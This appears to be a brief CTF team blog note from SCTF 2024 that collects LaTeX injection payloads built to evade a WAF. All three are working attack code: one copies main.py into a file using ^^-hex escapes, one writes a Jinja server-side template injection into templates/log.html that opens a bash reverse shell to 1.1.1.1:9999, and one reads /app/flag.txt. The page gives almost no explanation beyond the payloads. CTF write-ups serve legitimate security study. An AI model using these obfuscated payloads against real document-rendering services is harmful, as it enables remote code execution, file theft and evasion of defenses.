Categories

Latex

SCTF 2024 By W&M - W&M Team

May 31, 2025

Created

May 31, 2025

Updated

1 min read

Reading time

1 categories

Topics covered

Share:

Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.

some latex payload if there’s a waf

SCTF 2024 By W&M - W&M Team

\documentclass[]{article}
\begin{document}

\newread\infile
\openin\infile=main.py
\imm^^65diate\newwrite\outfile
\imm^^65diate\openout\outfile=a^^70p.l^^6fg
\loop\unless\ifeof\infile
    \imm^^65diate\read\infile to\line
    \imm^^65diate\write\outfile{\line}
\repeat
\closeout\outfile
\closein\infile
\newpage
foo
\end{document}

\documentclass[]{article}
\begin{document}
\newwrite\t
\openout\t=templates^^2flog.html
\write\t{{{lipsum.__globals__['os'].popen('bash -c "^^2fbin^^2fsh -i >& ^^2fdev^^2ftcp^^2f1.1.1.1^^2f9999 0>&1"').read()}}}
\closeout\t
\newpage
foo
\end{document}

\ExplSyntaxOn 
\g_tmpa_ior 
\ior_open:Nn 
\l_tmpa_str 
\g_tmpa_ior 
{/app/flag.txt} 
{\pdfescapestring{\l_tmpa_str}} 
\ExplSyntaxOff

Categories & Topics

This note is categorized under the following topics. Click on any category to explore more related content.

CTF

Share this note

Share:

Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.